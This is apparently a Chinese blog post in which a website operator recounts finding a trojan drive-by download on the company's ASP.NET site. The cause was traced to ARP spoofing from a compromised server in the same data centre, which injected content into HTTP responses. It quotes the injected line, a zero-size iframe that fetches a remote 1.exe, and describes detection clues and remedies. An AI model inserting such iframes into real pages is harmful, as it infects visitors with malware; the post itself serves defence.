下午的时候,访问公司网站,自动弹出下载提示*.exe。很显然是木马,不用质疑。第一想到的是服务器被人拿下了,进入服务器,一切正常,js、cs和aspx页面没有被篡改的痕迹.于是想到是不是我的代码被人反编译,然后被篡改,又放回去。打包网站,分析了下,没问题。
于是,打开网站,所有访问的*.aspx都会弹出下载。点击查看源代码,发现在代码最上面有一行<IFRAME height=0 src="httP://*.*.*.*:8080/1.exe" width=0></IFRAME>,查了下,应该是香港的VPN。但是,服务器上,php网站倒是正常。最后查出来,是因为:机房中的某台服务器被人拿下了,然后通过ARP攻击。
这个挂马方式不是将脚本或者代码直接植入文件中的,而是在我们访问的时候,服务器返回响应数据的时候被植入了这个iframe。也就是说系统源码没有问题,问题出在我们请求和服务器响应的环节。这个iframe是在客户端页面的最顶层的,也就是<html>标记的上面(不是包含在<html></html>标记里面),这也可以说明是动态被response了这个iframe,这样的问题同样会出现在其他的程序中,不仅是后台,前台同样会产生,在某个ipDNS解析的时候出现问题,首次访问正常,关闭IE后,再次访问就打不开。这总同样是遭受了art攻击。这种挂马,最大的难度在于:数据库里面查不到,源码里面也找不到被挂的马,首次访问没有问题,服务器访问没有问题,这就是典型的srt攻击,劫持服务器输出数据。最简单的方法是,更换服务器,或者安装arp防火墙